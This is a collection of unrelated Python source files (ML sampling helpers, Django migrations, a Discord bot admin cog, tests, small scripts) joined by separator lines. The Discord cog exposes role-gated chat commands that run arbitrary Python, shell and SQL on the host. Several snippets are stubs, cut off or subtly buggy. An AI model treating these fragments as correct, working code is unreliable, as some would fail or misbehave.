samples, _ = sample_gmm_from_mu_and_ids(mu, std, component_ids)
return samples, component_ids
def sample_trade_scenario(scenario: str, num_nodes):
scenarios = {'0:0', '0:1', '1:0', '1:1', '2:2'}
if scenario not in scenarios:
raise RuntimeError(f"Invalid scenario {scenario}")
emb_scenario, gates_scenario = scenario.split(':')
emb_std = 1.
if emb_scenario == '0':
emb_mu = np.array([[-100., -20.], [100., 20.]])
elif emb_scenario == '1':
emb_mu = np.array([[-100., 20.], [100., -20.]])
elif emb_scenario == '2':
emb_mu = np.array([[100., 100.], [0., 0.], [0., -50]])
else:
raise RuntimeError(f"Invalid scenario {scenario}")
emb_samples, emb_comp_ids = sample_t_from_mu(num_nodes, emb_mu, emb_std)
gates_std = 0.01
if gates_scenario == '0':
gates_mu = np.array([[-1., -1.]])
gates_samples, gates_comp_ids = sample_gmm_from_mu(num_nodes, gates_mu, gates_std)
num_traders = int(0.5 * num_nodes)
traders = np.random.choice(num_nodes, size=num_traders, replace=False)
traders1 = traders[:num_traders // 2]
traders2 = traders[num_traders // 2:]
gates_samples[traders1, 0] = 4. * (np.ones((len(traders1),)) + gates_std * np.random.randn(len(traders1)))
gates_samples[traders2, 1] = 4. * (np.ones((len(traders2),)) + gates_std * np.random.randn(len(traders2)))
elif gates_scenario == '2':
gates_mu = np.array([[4., 4.], [0., -5.], [-5., 1.]])
gates_samples, gates_comp_ids = sample_t_from_mu_and_ids(gates_mu, gates_std, emb_comp_ids)
return emb_samples, gates_samples, emb_comp_ids, gates_comp_ids
def sample_scenario(n, scenario,
num_emb_cross_dim,
emb_std, gates_std,
emb_num_sigma=16, gates_num_sigma=16):
node_embeddings, node_comp_ids = sample_2modes_2d(n, std=emb_std, num_sigma=emb_num_sigma,
num_cross_dims=num_emb_cross_dim)
if scenario == "inter":
gates, gate_ids = sample_2modes_2d(n, std=gates_std, num_sigma=gates_num_sigma,
num_cross_dims=0,
component_ids=node_comp_ids)
elif scenario == "intra":
gates, gate_ids = sample_2modes_2d(n, std=gates_std, num_sigma=gates_num_sigma,
num_cross_dims=num_emb_cross_dim,
component_ids=None)
else:
raise ValueError(f"Unknown scenario {scenario}")
return node_embeddings, node_comp_ids, gates, gate_ids
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('proyectos', '0020_auto_20150813_1815'),
]
operations = [
migrations.AlterField(
model_name='detalleproductoestimacion',
name='Estimaciones',
field=models.ForeignKey(blank=True, to='proyectos.Estimaciones', null=True),
),
]
|
from onegov.core.orm.abstract import AdjacencyList
from onegov.core.orm.abstract import MoveDirection
from onegov.core.orm.mixins import ContentMixin
from onegov.core.orm.mixins import meta_property
from onegov.core.orm.mixins import TimestampMixin
from sqlalchemy import Boolean
from sqlalchemy import Column
from sqlalchemy import or_
from sqlalchemy_utils import observes
from sqlalchemy.orm import object_session
class Organization(AdjacencyList, ContentMixin, TimestampMixin):
""" Defines an organization for official notices.
Although the categories are defined as a flexible adjacency list, we
currently use it only as a two-stage adjacency list key-value list
(name-title).
"""
__tablename__ = 'gazette_organizations'
#: True, if this organization is still in use.
active = Column(Boolean, nullable=True)
external_name = meta_property('external_name')
def notices(self):
""" Returns a query to get all notices related to this category. """
from onegov.gazette.models.notice import GazetteNotice # circular
notices = object_session(self).query(GazetteNotice)
notices = notices.filter(
GazetteNotice._organizations.has_key(self.name) # noqa
)
return notices
@property
def in_use(self):
""" True, if the organization is used by any notice. """
if self.notices().first():
return True
return False
@observes('title')
def title_observer(self, title):
from onegov.gazette.models.notice import GazetteNotice # circular
notices = self.notices()
notices = notices.filter(
or_(
GazetteNotice.organization.is_(None),
GazetteNotice.organization != title
)
)
for notice in notices:
notice.organization = title
class OrganizationMove:
""" Represents a single move of an adjacency list item. """
def __init__(self, session, subject_id, target_id, direction):
self.session = session
self.subject_id = subject_id
self.target_id = target_id
self.direction = direction
@classmethod
def for_url_template(cls):
return cls(
session=None,
subject_id='{subject_id}',
target_id='{target_id}',
direction='{direction}'
)
def execute(self):
from onegov.gazette.collections import OrganizationCollection
organizations = OrganizationCollection(self.session)
subject = organizations.by_id(self.subject_id)
target = organizations.by_id(self.target_id)
if subject and target and subject != target:
if subject.parent_id == target.parent_id:
OrganizationCollection(self.session).move(
subject=subject,
target=target,
direction=getattr(MoveDirection, self.direction)
)
|
import io
import copy
import random
import asyncio
import textwrap
import traceback
from typing import Union, Sequence
from contextlib import redirect_stdout
import discord
import aiosqlite
from discord.ext import commands
from potato_bot.bot import Bot
from potato_bot.cog import Cog
from potato_bot.utils import run_process_shell
from potato_bot.checks import is_owner, is_techadmin
class TechAdmin(Cog):
"""Commands for technical staff"""
SQL_VALUE_LEN_CAP = 30
PAGINATOR_PAGES_CAP = 5
async def cog_check(self, ctx):
return await is_techadmin().predicate(ctx)
@commands.command()
async def load(self, ctx, module: str):
"""Load extension"""
self.bot.load_extension(f"potato_bot.cogs.{module}")
await ctx.ok()
@commands.command()
async def unload(self, ctx, module: str):
"""Unload extension"""
self.bot.unload_extension(f"potato_bot.cogs.{module}")
await ctx.ok()
@commands.command()
async def reload(self, ctx, module: str):
"""Reload extension"""
self.bot.reload_extension(f"potato_bot.cogs.{module}")
await ctx.ok()
# https://github.com/Rapptz/RoboDanny/blob/715a5cf8545b94d61823f62db484be4fac1c95b1/cogs/admin.py#L422
@commands.command(aliases=["sudo"])
@is_owner()
async def runas(
self, ctx, user: Union[discord.Member, discord.User], *, command: str
):
"""Run command as other user"""
msg = copy.copy(ctx.message)
msg.channel = ctx.channel
msg.author = user
msg.content = f"{ctx.prefix}{command}"
new_ctx = await self.bot.get_context(msg, cls=type(ctx))
await self.bot.invoke(new_ctx)
await ctx.ok()
def _make_paginator(self, text: str, prefix: str = "```") -> commands.Paginator:
paginator = commands.Paginator(prefix=prefix)
# https://github.com/Rapptz/discord.py/blob/5c868ed871184b26a46319c45a799c190e635892/discord/ext/commands/help.py#L125
max_page_size = (
paginator.max_size - len(paginator.prefix) - len(paginator.suffix) - 2
)
def wrap_with_limit(text: str, limit: int):
limit -= 1
line_len = 0
for i, c in enumerate(text):
if c == "\n" or line_len > limit:
yield text[i - line_len : i]
line_len = 0
else:
line_len += 1
if line_len != 0:
yield text[-line_len - 1 :]
for line in wrap_with_limit(text, max_page_size):
paginator.add_line(line)
return paginator
async def _send_paginator(self, ctx, paginator: commands.Paginator):
if len(paginator.pages) > self.PAGINATOR_PAGES_CAP:
pages = paginator.pages[-self.PAGINATOR_PAGES_CAP :]
await ctx.send(
f"Sending last **{len(pages)}** of **{len(paginator.pages)}** pages"
)
else:
pages = paginator.pages
for page in pages:
await ctx.send(page)
@commands.command()
async def eval(self, ctx, *, program: str):
"""
Evaluate code inside bot, with async support
Has conveniece shortcuts like
- ctx
- discord
To get result you can either print or return object.
"""
if program.startswith("```") and program.endswith("```"):
# strip codeblock
program = program[:-3]
program = "\n".join(program.split("\n")[1:])
async with ctx.typing():
result = await self._eval(ctx, program)
result = result.replace(self.bot.http.token, "TOKEN_LEAKED")
paginator = self._make_paginator(result, prefix="```py\n")
await self._send_paginator(ctx, paginator)
@commands.command()
async def exec(self, ctx, *, arguments: str):
"""Execute shell command"""
async with ctx.typing():
paginator = await self._exec(ctx, arguments)
await self._send_paginator(ctx, paginator)
@commands.command()
async def sql(self, ctx, *, program: str):
"""Run SQL command against bot database"""
async with ctx.typing():
async with self.bot.db.cursor() as cur:
await cur.execute(program)
result = await cur.fetchall()
if not result:
return await ctx.ok()
paginator = await self._sql_table(result)
await self._send_paginator(ctx, paginator)
async def _eval(self, ctx, program) -> str:
# copied from https://github.com/Fogapod/KiwiBot/blob/49743118661abecaab86388cb94ff8a99f9011a8/modules/owner/module_eval.py
# (originally copied from R. Danny bot)
glob = {
"self": self,
"bot": self.bot,
"ctx": ctx,
"message": ctx.message,
"guild": ctx.guild,
"author": ctx.author,
"channel": ctx.channel,
"asyncio": asyncio,
"random": random,
"discord": discord,
}
fake_stdout = io.StringIO()
to_compile = "async def func():\n" + textwrap.indent(program, " ")
try:
exec(to_compile, glob)
except Exception as e:
return f"{e.__class__.__name__}: {e}"
func = glob["func"]
try:
with redirect_stdout(fake_stdout):
returned = await func()
except asyncio.CancelledError:
raise
except Exception:
return f"{fake_stdout.getvalue()}{traceback.format_exc()}"
else:
from_stdout = fake_stdout.getvalue()
if returned is None:
if from_stdout:
return f"{from_stdout}"
return "Evaluated"
else:
return f"{from_stdout}{returned}"
async def _exec(self, ctx, arguments: str) -> commands.Paginator:
stdout, stderr = await run_process_shell(arguments)
if stderr:
result = f"STDERR:\n{stderr}\n{stdout}"
else:
result = stdout
result = result.replace(self.bot.http.token, "TOKEN_LEAKED")
return self._make_paginator(result, prefix="```bash\n")
async def _sql_table(self, result: Sequence[aiosqlite.Row]) -> commands.Paginator:
columns = result[0].keys()
col_widths = [len(c) for c in columns]
for row in result:
for i, column in enumerate(columns):
col_widths[i] = min(
(
max((col_widths[i], len(str(row[column])))),
self.SQL_VALUE_LEN_CAP,
)
)
header = " | ".join(
f"{column:^{col_widths[i]}}" for i, column in enumerate(columns)
)
separator = "-+-".join("-" * width for width in col_widths)
def sanitize_value(value):
value = str(value).replace("\n", "\\n")
if len(value) > self.SQL_VALUE_LEN_CAP:
value = f"{value[:self.SQL_VALUE_LEN_CAP - 2]}.."
return value
paginator = commands.Paginator()
paginator.add_line(header)
paginator.add_line(separator)
for row in result:
paginator.add_line(
" | ".join(
f"{sanitize_value(value):<{col_widths[i]}}"
for i, value in enumerate(row)
)
)
return paginator
def setup(bot: Bot):
bot.add_cog(TechAdmin(bot))
|
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
sns.set(style="ticks")
from sklearn.datasets import make_blobs
X, y = make_blobs(n_samples=600, centers=4, n_features=3, random_state=42, cluster_std = 2)
df = pd.DataFrame(X)
df.columns = ["col_1", "col_2", "col_3"]
df["Label"] = y
df.to_csv("make_blobs_data_3D.csv")
from mpl_toolkits.mplot3d import Axes3D
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
ax.scatter(df["col_1"], df["col_2"], df["col_3"], c = df["Label"], cmap='Accent', s=5)
ax.set_xlabel('X Axis')
ax.set_ylabel('Y Axis')
ax.set_zlabel('Z Axis')
plt.savefig("blobs_scatter_3D.png")
plt.show()
|
#! usr/bin/python3
from treenode import TreeNode
def levelOrder(root: TreeNode) -> List[List[int]]:
arr = []
def prtnext(root: TreeNode) -> list:
pass
|
import sys
from abc import ABC, abstractmethod
from typing import Callable, Dict
from colosseum.ipc import FileNoComs
pipeout_fileno = sys.stdout.fileno()
pipein_fileno = sys.stdin.fileno()
_coms = FileNoComs(
True,
read_fileno=pipein_fileno,
write_fileno=pipeout_fileno
)
def log(*args, **kwargs):
"""
Logs a message to the parent process stdout. The standard print function
will not work because stdout is used for inter-process communication.
The parent process will only service the request when it expects a message
from this process. I.e. during this bot's turn.
"""
_coms.send(log={'args': args, 'kwargs': kwargs})
def get_input(*args, **kwargs):
"""
Gets an input from the parent process stdin. The standard input function
will not work because stdin is used for inter-process communication.
The parent process will only service the request when it expects a message
from this process. I.e. during this bot's turn.
"""
_coms.send(input={'args': args, 'kwargs':kwargs})
response = _coms.recv()
return response.get('s', '')
class Bot(ABC):
"""
Base class for a bot.
"""
def __init__(self, tracker_type:type):
"""
params:
tracker_type:type - The type of the associated GameTracker
"""
self._tracker_type = tracker_type
self._commands = {'stop': self._stop, 'new_game': self._new_game,
'update': self._update, 'your_turn': self._take_turn}
while(True):
msg = _coms.recv()
for command, params in msg.items():
# I cannot use the walrus operator since this might run on
# earlier versions of python
target = self._commands.get(command, None)
if target is not None:
target(**params)
def _register_commands(self, commands:Dict[str, Callable]):
self._commands.update(commands)
def _register_command(self, command:str, target:Callable):
self._register_commands({command: target})
def _stop(self, **kwargs):
_coms.close()
exit(kwargs.get('eid', 0))
def _update(self, **kwargs):
self._game.update(**kwargs)
self.update()
def _take_turn(self, **kwargs):
response = self.take_turn()
_coms.send(**response)
def _new_game(self, **game_params):
self._game = self._tracker_type(**game_params)
self.new_game()
@property
def game(self):
return self._game
@abstractmethod
def take_turn(self):
"""
The logic for the bot to take their turn
returns:
The move that the bot wishes to make
"""
...
@abstractmethod
def update(self):
...
@abstractmethod
def new_game(self):
"""
A 'reset' method to start a new game. This does not have to reset the
bot to its original state. The reason to use a resetter over
re-instantiating or re-initializing the object is to allow for
'remembering' behavior.
"""
... |
from django.shortcuts import render, redirect
from django.views.generic.edit import CreateView
from django.views.generic import ListView, DetailView
from django.views.generic.base import View
from movie.models import Movie
from movie.forms import ReviewForm
class MovieView(ListView):
"""Вывод всех фильмов"""
model = Movie
queryset = Movie.objects.filter(draft=False)
def get_context_data(self, **kwargs):
context = super(MovieView, self).get_context_data(**kwargs)
context['title'] = 'Главная'
return context
class MovieDetailView(DetailView):
"""Описание определенного фильма"""
model = Movie
slug_field = 'url'
class AddReview(View):
"""Отправка отзывов"""
def post(self, request, pk):
form = ReviewForm(request.POST)
movie = Movie.objects.get(id=pk)
if form.is_valid():
form = form.save(commit=False)
if request.POST.get("parent", None):
form.parent_id = int(request.POST.get("parent"))
form.movie = movie
form.save()
return redirect(movie.get_absolute_url())
|
import os
from dotenv import load_dotenv
from slack_sdk import WebClient
from slack_sdk.errors import SlackApiError
from src.Config import Config
class Slack(Config):
token = None
client = None
def __init__(self):
super().__init__()
self.set_token()
def set_token(self):
if os.path.exists(".env"):
load_dotenv(verbose=True)
self.token = os.environ["SLACK_TOKEN"]
self.client = WebClient(token=self.token)
def post_image(self, file):
channel_name = self.SLACK_CHANNEL_NAME
try:
response = self.client.files_upload(
channels=channel_name,
file=file,
)
if not response["ok"]:
raise SlackApiError("슬랙 전송 실패")
return True
except SlackApiError:
return False
|
# -*- coding: utf-8 -*-
# flake8: noqa
# Generated by Django 1.11 on 2017-05-06 15:43
from __future__ import unicode_literals
import ckeditor_uploader.fields
from django.db import migrations, models
import django.db.models.deletion
import image_cropping.fields
import snippets.utils.datetime
class Migration(migrations.Migration):
initial = True
dependencies = [
('core', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Article',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True, db_index=True, verbose_name='Создано')),
('updated', models.DateTimeField(auto_now=True, verbose_name='Обновлено')),
('ordering', models.IntegerField(db_index=True, default=0, verbose_name='Порядок')),
('status', models.SmallIntegerField(choices=[(0, 'Черновик'), (1, 'Публичный'), (2, 'Скрытый')], default=1, verbose_name='Статус')),
('title', models.CharField(db_index=True, max_length=255, verbose_name='Заголовок')),
('title_ru', models.CharField(db_index=True, max_length=255, null=True, verbose_name='Заголовок')),
('title_en', models.CharField(db_index=True, max_length=255, null=True, verbose_name='Заголовок')),
('title_fr', models.CharField(db_index=True, max_length=255, null=True, verbose_name='Заголовок')),
('slug', models.SlugField(help_text='Разрешены только латинские символы, цифры, символ подчеркивания и дефис (минус)', max_length=150, unique=True, verbose_name='Алиас')),
('publish_date', models.DateTimeField(db_index=True, default=snippets.utils.datetime.utcnow, help_text='Можно задать на будущее', verbose_name='Дата публикации')),
('image', image_cropping.fields.ImageCropField(blank=True, max_length=255, null=True, upload_to='news', verbose_name='Изображение')),
('thumb_list', image_cropping.fields.ImageRatioField('image', '200x400', adapt_rotation=False, allow_fullsize=False, free_crop=False, help_text=None, hide_image_field=False, size_warning=False, verbose_name='Эскиз в списке')),
('excerpt', ckeditor_uploader.fields.RichTextUploadingField(blank=True, null=True, verbose_name='Анонс')),
('excerpt_ru', ckeditor_uploader.fields.RichTextUploadingField(blank=True, null=True, verbose_name='Анонс')),
('excerpt_en', ckeditor_uploader.fields.RichTextUploadingField(blank=True, null=True, verbose_name='Анонс')),
('excerpt_fr', ckeditor_uploader.fields.RichTextUploadingField(blank=True, null=True, verbose_name='Анонс')),
('body', ckeditor_uploader.fields.RichTextUploadingField(blank=True, help_text='Выводится выше всех секций', verbose_name='Контент')),
('body_ru', ckeditor_uploader.fields.RichTextUploadingField(blank=True, help_text='Выводится выше всех секций', null=True, verbose_name='Контент')),
('body_en', ckeditor_uploader.fields.RichTextUploadingField(blank=True, help_text='Выводится выше всех секций', null=True, verbose_name='Контент')),
('body_fr', ckeditor_uploader.fields.RichTextUploadingField(blank=True, help_text='Выводится выше всех секций', null=True, verbose_name='Контент')),
],
options={
'verbose_name': 'Статья',
'verbose_name_plural': 'База знаний',
},
),
migrations.CreateModel(
name='ArticleCategory',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True, db_index=True, verbose_name='Создано')),
('updated', models.DateTimeField(auto_now=True, verbose_name='Обновлено')),
('ordering', models.IntegerField(db_index=True, default=0, verbose_name='Порядок')),
('status', models.SmallIntegerField(choices=[(0, 'Черновик'), (1, 'Публичный'), (2, 'Скрытый')], default=1, verbose_name='Статус')),
('title', models.CharField(db_index=True, max_length=255, verbose_name='Заголовок')),
('title_ru', models.CharField(db_index=True, max_length=255, null=True, verbose_name='Заголовок')),
('title_en', models.CharField(db_index=True, max_length=255, null=True, verbose_name='Заголовок')),
('title_fr', models.CharField(db_index=True, max_length=255, null=True, verbose_name='Заголовок')),
('slug', models.SlugField(help_text='Разрешены только латинские символы, цифры, символ подчеркивания и дефис (минус)', max_length=150, unique=True, verbose_name='Алиас')),
],
options={
'verbose_name': 'Категория базы знаний',
'verbose_name_plural': 'Категории базы знаний',
},
),
migrations.CreateModel(
name='ArticleSection',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True, db_index=True, verbose_name='Создано')),
('updated', models.DateTimeField(auto_now=True, verbose_name='Обновлено')),
('ordering', models.IntegerField(db_index=True, default=0, verbose_name='Порядок')),
('status', models.SmallIntegerField(choices=[(0, 'Черновик'), (1, 'Публичный'), (2, 'Скрытый')], default=1, verbose_name='Статус')),
('title', models.CharField(blank=True, max_length=255, null=True, verbose_name='Заголовок секции')),
('title_ru', models.CharField(blank=True, max_length=255, null=True, verbose_name='Заголовок секции')),
('title_en', models.CharField(blank=True, max_length=255, null=True, verbose_name='Заголовок секции')),
('title_fr', models.CharField(blank=True, max_length=255, null=True, verbose_name='Заголовок секции')),
('body', ckeditor_uploader.fields.RichTextUploadingField(blank=True, help_text='Выводится выше всех секций', verbose_name='Контент')),
('body_ru', ckeditor_uploader.fields.RichTextUploadingField(blank=True, help_text='Выводится выше всех секций', null=True, verbose_name='Контент')),
('body_en', ckeditor_uploader.fields.RichTextUploadingField(blank=True, help_text='Выводится выше всех секций', null=True, verbose_name='Контент')),
('body_fr', ckeditor_uploader.fields.RichTextUploadingField(blank=True, help_text='Выводится выше всех секций', null=True, verbose_name='Контент')),
('article', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='sections', to='knowledge.Article', verbose_name='Статья')),
('gallery', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='article_sections', to='core.Gallery', verbose_name='Галерея фотографий')),
],
options={
'verbose_name': 'Секция статьи',
'verbose_name_plural': 'Секции статьи',
},
),
migrations.AddField(
model_name='article',
name='categories',
field=models.ManyToManyField(blank=True, related_name='articles', to='knowledge.ArticleCategory', verbose_name='Категории базы знаний'),
),
]
|
import pytest
from onegov.ticket import Handler
from onegov.ticket.errors import DuplicateHandlerError
def test_invalid_handler_code(handlers):
# it's possible for the registry to not be empty due to other tests
count = len(handlers.registry)
with pytest.raises(AssertionError):
handlers.register('abc', Handler)
with pytest.raises(AssertionError):
handlers.register('AB', Handler)
assert len(handlers.registry) == count
def test_register_handler(handlers):
class FooHandler(Handler):
pass
class BarHandler(Handler):
pass
handlers.register('FOO', FooHandler)
handlers.register('BAR', BarHandler)
assert handlers.get('FOO') == FooHandler
assert handlers.get('BAR') == BarHandler
with pytest.raises(DuplicateHandlerError):
handlers.register('FOO', BarHandler)
|
N, K = map( int, input().split())
T = [(0,0)]*N
for i in range(N):
t, d = map( int, input().split())
T[i] = (d,t)
T.sort( key= None, reverse = True)
C = T[:K]
AC = T[K:]
kiso = 0
s = 0
S = [0]*(N+1)
for i in range(K):
d, t = T[i]
kiso += d
if S[t] == 0:
S[t] = 1
s += 1
else:
S[t] += 1
ans = kiso + s**2
C.sort()
r = 0
for i in range(K):
d, t = C[i]
if S[t] >= 2:
while r < N-K:
if S[ AC[r][1]] == 0:
S[t] -= 1
S[ AC[r][1]] += 1
s += 1
kiso -= d
kiso += AC[r][0]
r += 1
break
r += 1
ans = max( ans, kiso + s**2)
print( ans)
|
from atm_card import ATMCard
class Customer:
def __init__(self, id, cust_pin = 1234, cust_balance = 10000):
self.__id = id
self.__atm = ATMCard(cust_pin, cust_balance)
@property
def id(self):
pass
@id.getter
def id(self):
return self.__id
@property
def cust_pin(self):
pass
@cust_pin.setter
def cust_pin(self, new_pin):
self.__atm.default_pin = new_pin
def check_balance(self):
return self.__atm.default_balance
def check_pin(self, input_pin):
if self.__atm.default_pin == input_pin:
return True
else:
return False
def withdraw_balance(self, nominal):
self.__atm.default_balance -= nominal
def deposit_balance(self, nominal):
self.__atm.default_balance += nominal |
"""
------------------------------------
@Time : 2020/9/15 14:46
@Auth : chai
@File : test_2_homePageCase.py
@IDE : PyCharm
@Motto:
------------------------------------
"""
import time
import random
import pytest
from Page import BasePage
from data.login_data import LoginData
from Page.BasePage import BasePage
from conftest import _capture_screenshot
from data.recommend_data import RecommendData
from Page.PageObject import RecommendPage
@pytest.mark.Test
class TestRecommendPage(object):
"""登录"""
recommendPage_data = RecommendData
recommendPage_data_select1 = recommendPage_data.select1_data #这个参数是用来做参数化的
recommendPage_data_select2 = recommendPage_data.select2_data # 这个参数是用来做参数化的
recommendPage_data_select3 = recommendPage_data.select3_data # 这个参数是用来做参数化的
recommendPage_data_select4 = recommendPage_data.select4_data # 这个参数是用来做参数化的
def test_recommend0(self, login):
home_page = login[1]
time.sleep(7)
home_page.select_menu(menu="recommend")
@pytest.mark.parametrize('value,expect', recommendPage_data_select1)
def test_recommend1(self, login,value,expect):
# home_page = login[1]
# time.sleep(2)
recommend_page = login[2]
# home_page.select_menu(menu="recommend")
#recommend_page.click(recommend_page.select1[0],recommend_page.select1[1])
recommend_page.select_option(recommend_page.select1[1],value,"index")
actual_all = recommend_page.get_element_text(recommend_page.select1[0],recommend_page.select1[1]).split('\n')
actual = actual_all[int(value)].strip()
assert actual == expect, "断言成功"
@pytest.mark.parametrize('value,expect', recommendPage_data_select2)
def test_recommend2(self, login, value, expect):
recommend_page = login[2]
# recommend_page.click(recommend_page.select1[0],recommend_page.select1[1])
recommend_page.select_option(recommend_page.select2[1], value, "index")
actual_all = recommend_page.get_element_text(recommend_page.select2[0], recommend_page.select2[1]).split('\n')
actual = actual_all[int(value)].strip()
assert actual == expect, "断言成功"
@pytest.mark.parametrize('value,expect', recommendPage_data_select3)
def test_recommend3(self, login,value,expect):
recommend_page = login[2]
#recommend_page.click(recommend_page.select1[0],recommend_page.select1[1])
recommend_page.select_option(recommend_page.select3[1],value,"index")
actual_all = recommend_page.get_element_text(recommend_page.select3[0],recommend_page.select3[1]).split('\n')
actual = actual_all[int(value)].strip()
assert actual == expect, "断言成功"
@pytest.mark.parametrize('value,expect', recommendPage_data_select4)
def test_recommend4(self, login, value, expect):
recommend_page = login[2]
# recommend_page.click(recommend_page.select1[0],recommend_page.select1[1])
recommend_page.select_option(recommend_page.select4[1], value, "index")
actual_all = recommend_page.get_element_text(recommend_page.select4[0], recommend_page.select4[1]).split('\n')
actual = actual_all[int(value)].strip()
assert actual == expect, "断言成功"
@pytest.mark.Test
class TestRecommendPage_flow(object):
def test_recommend_flow(self, login):
home_page = login[1]
time.sleep(7)
home_page.select_menu(menu="recommend")
recommend_page = login[2]
recommend_page.select_option(recommend_page.select1[1], random.randint(0,3), "index")
recommend_page.select_option(recommend_page.select2[1], 0, "index")
recommend_page.select_option(recommend_page.select3[1], random.randint(0,5), "index")
recommend_page.select_option(recommend_page.select4[1], random.randint(0,2), "index")
recommend_page.click("xpath", recommend_page.nextBtn[1])
time.sleep(1)
recommend_page.click("xpath", recommend_page.select5_opt2[1])
recommend_page.click("xpath", recommend_page.select6_opt2[1])
recommend_page.click("xpath", recommend_page.select7_opt2[1])
recommend_page.click("xpath", recommend_page.select8_opt2[1])
recommend_page.click("xpath", recommend_page.select9_opt2[1])
recommend_page.click("xpath", recommend_page.loginBtn[1])
assert "Sevice Recommend" in recommend_page.driver.page_source
recommend_page.click("xpath", "/html/body/div[4]/div/ul/li[1]/div[2]/div[2]/h4/a")
time.sleep(2)
assert "立 刻 购 买" in recommend_page.driver.page_source
# def test_recommend(self, login):
# home_page = login[1]
# recommend_page = login[2]
# print("home_page",home_page)
# time.sleep(7)
# home_page.select_menu(menu="recommend")
# #home_page.option_value_check("//*[@id='business_types']", "option", "製造業, 卸売業, 小売業, IT, ")
# # recommend_page.click_select1_btn()
# # recommend_page.click_select1_opt(2,"index")
# recommend_page.click(recommend_page.select1[0],recommend_page.select1[1])
# recommend_page.select_option(recommend_page.select1[1],2,"index")
# #home_page.select_option(locator="//*[@id='business_types']", value=2, type="index")
# time.sleep(2)
# #expect = recommend_page.get_element_text("xpath","//*[@id='business_types']")
# print("recommend_page.select1",recommend_page.select1,recommend_page.select1[1])
# expect = recommend_page.get_element_text(recommend_page.select1[0],recommend_page.select1[1])
# assert "小売業" in expect, "路径跳转正确, 断言成功"
# home_page.select_option(locator="//*[@id='position']", value=0, type="index")
# expect = home_page.get_element_text("xpath", "//*[@id='position']")
# assert "経営者" in expect, "路径跳转正确, 断言成功"
# home_page.select_option(locator="//*[@id='scale']", value=1, type="index")
# expect = home_page.get_element_text("xpath", "//*[@id='scale']")
# assert "10~20人未満" in "10~20人未満", "路径跳转正确, 断言成功"
# time.sleep(5)
# #home_page.get_element(self.Button_Search).click()
if __name__ == "__main__":
pytest.main(['-v', 'test_3_recommendPageCase.py']) |
from unittest import TestCase
import unittest
import sys
sys.path.append('../')
from leetCodeUtil import TreeNode
from convert_sorted_array_binarytree import Solution
class TestSolution(TestCase):
def test_convertCase1(self):
## Test case 1
sol = Solution()
node = sol.sortedArrayToBST([1, 2, 3])
result1 = list(node.getBFS(node))
exp1 = [2, 1, 3]
self.assertListEqual(result1, exp1)
def test_convertCase2(self):
## Test case 1
sol = Solution()
node = sol.sortedArrayToBST([-10, -3, 0, 5, 9])
result1 = list(node.getBFS(node))
exp1 = [0, -3, 9, -10, 5]
self.assertListEqual(result1, exp1)
if __name__ == '__main__':
unittest.main() |
import os
import time
import datetime
import pandas as pd
import requests
from key import fcs_key
# TODO: dividend tracker pulling newest update from database
# TODO: appending newest update to GSheets (online database)
def check_make_dir() -> str:
""" Checks if dir exists and creates it.
To hold csv_file
:return: Directory name '../Overall-Dividends'
"""
directory = f"{os.getcwd()}\\Overall-Dividends"
if not os.path.exists(directory):
os.mkdir(directory)
return directory
def check_file(filename) -> bool:
""" Checks if file exists in the directory stated
:return: true if file exists in directory
"""
if os.path.exists(f"{check_make_dir()}\\{filename}"):
return True
else:
return False
def last_tracked_date() -> dict:
""" Return dict containing last tracked date for each dividend
:return: dict of stock labels and the last tracked date for dividend payout
"""
# TODO: use pointers(?) to update last_tracked_date dynamically after push_to_sheets.get_new_data() is updated
tracked_date = {}
stock_data = key_stock_labels()
for k, v in stock_data.items():
tracked_date[k] = get_epoch(-100)
return tracked_date
def key_stock_labels() -> dict:
""" Define stock data structure
:param option: Selects either from start of from current date
:return: dict of stock labels based on user choice
"""
stock_start = {'ES3': {'name': 'STI_ETF', 'bought': '1591228800', 'units': 600.0, 'currency': 'SGD'},
'BUOU': {'name': 'Fraser_L&C_Trust', 'bought': '1591228800', 'units': 2759.0, 'currency': 'SGD'},
'D05': {'name': 'DBS', 'bought': '1589328000', 'units': 100.0, 'currency': 'SGD'},
'BTOU': {'name': 'Manulife_USD_REIT', 'bought': '1508198400', 'units': 3500.0, 'currency': 'USD'},
'B73': {'name': 'Global_Investments', 'bought': '1494806400', 'units': 10821, 'currency': 'SGD'},
'558': {'name': 'UMS', 'bought': '1520812800', 'units': 1500, 'currency': 'SGD'},
'BN2': {'name': 'Valuetronics', 'bought': '1549843200', 'units': 4000, 'currency': 'HKD'}}
return stock_start
def get_date(epoch_date: int) -> datetime:
""" Converts normal.
:return: normal date
"""
return datetime.datetime.fromtimestamp(epoch_date).now().date()
def get_epoch(day_diff: int) -> int:
""" Converts normal date to epoch date including time-difference from today's date.
:param day_diff: number of day difference from today's date
:return: epoch timestamp
"""
today_date = datetime.datetime.now().date() + datetime.timedelta(days=day_diff)
dt = datetime.datetime.strptime(str(today_date), '%Y-%m-%d')
epoch_today = int(time.mktime(dt.timetuple()))
return epoch_today
def download_write_csv() -> None:
""" Downloads csv file from yahoo.finance and store locally for analysis
"""
# TODO: always overwrite downloads to refresh and obtain new data
stock = key_stock_labels()
epoch_date = get_epoch(0)
for k, v in stock.items():
url = f"https://query1.finance.yahoo.com/v7/finance/download/{k}.SI?period1={v['bought']}&period2={epoch_date}&interval=1d&events=div"
response = requests.get(url)
filename = f"{v['name']}_dividends.csv"
if check_file(filename):
print(f"{filename} already exists")
continue
else:
with open(f"{check_make_dir()}\\{filename}", 'wb') as csv_file:
csv_file.write(response.content)
print(f"Published {check_make_dir()}\\{filename}")
def currency_converter(foreign_currency: list) -> dict:
""" Converts the amount from respective currency to SGD using FCSAPI.
:param foreign_currency: List of foreign currencies to convert
:return: Total amount in SGD
"""
sgd = 'SGD'
currency_conversions = {}
for i in foreign_currency:
